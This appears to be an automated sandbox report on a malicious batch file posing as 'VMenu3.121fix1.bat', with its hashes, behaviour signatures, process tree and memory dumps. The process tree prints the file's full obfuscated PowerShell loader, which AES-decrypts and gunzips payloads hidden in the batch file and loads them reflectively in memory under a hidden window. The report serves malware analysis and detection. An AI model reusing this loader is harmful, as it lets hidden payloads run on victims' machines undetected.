Analysis

  • max time kernel
    122s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05/03/2025, 03:59

General

  • Target

    VMenu3.121fix1.bat

  • Size

    527KB

  • MD5

    3d1653ee332959fc6ea17400cdb636bd

  • SHA1

    3a75f6b73477b63300bc1065caaa7c9af066b6b4

  • SHA256

    fdb0641302824a729dcdbf6235a60a7661ee14951f82cc486cf0a874e8c38e1e

  • SHA512

    6eaaf2c0cd2322dcb9fcd71d030afaabaf13b0ed881fafe8db569da5cb2e196147045105067b3d5dc9aa80d2c61d44d6f063b82c74f6954b5bb956e4597e0b06

  • SSDEEP

    6144:BLG0TmgMe4wGS6I4LjSAeEP3xI0r+/nBkJgrICpdZGz2LDpb5uZ8OaE2i88tmKb4:BCZgMe46AeSBHoBigr3ZnLjmsi4xq/G

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\VMenu3.121fix1.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1924
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2504
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
          PID:2388
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FUnCUHbp7bZ3aDt7EaVZSvFYhobW2XMUVK66Zb99X4Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7RSYmNKHEzHJb8J9Ope6aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FmbNL=New-Object System.IO.MemoryStream(,$param_var); $RglAC=New-Object System.IO.MemoryStream; $acWbi=New-Object System.IO.Compression.GZipStream($FmbNL, [IO.Compression.CompressionMode]::Decompress); $acWbi.CopyTo($RglAC); $acWbi.Dispose(); $FmbNL.Dispose(); $RglAC.Dispose(); $RglAC.ToArray();}function execute_function($param_var,$param2_var){ $IsgCr=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WIgyd=$IsgCr.EntryPoint; $WIgyd.Invoke($null, $param2_var);}$coheU = 'C:\Users\Admin\AppData\Local\Temp\VMenu3.121fix1.bat';$host.UI.RawUI.WindowTitle = $coheU;$MuzzS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($coheU).Split([Environment]::NewLine);foreach ($rWFCs in $MuzzS) { if ($rWFCs.StartsWith('AXBwvMvJcDRzRiGDBjAF')) { $FODgs=$rWFCs.Substring(20); break; }}$payloads_var=[string[]]$FODgs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        2⤵
          PID:2368
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2488

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/2488-4-0x000007FEF5B3E000-0x000007FEF5B3F000-memory.dmp

        Filesize

        4KB

      • memory/2488-6-0x0000000002910000-0x0000000002918000-memory.dmp

        Filesize

        32KB

      • memory/2488-5-0x000000001B670000-0x000000001B952000-memory.dmp

        Filesize

        2.9MB

      • memory/2488-8-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

        Filesize

        9.6MB

      • memory/2488-7-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

        Filesize

        9.6MB

      • memory/2488-9-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

        Filesize

        9.6MB

      • memory/2488-10-0x000007FEF5B3E000-0x000007FEF5B3F000-memory.dmp

        Filesize

        4KB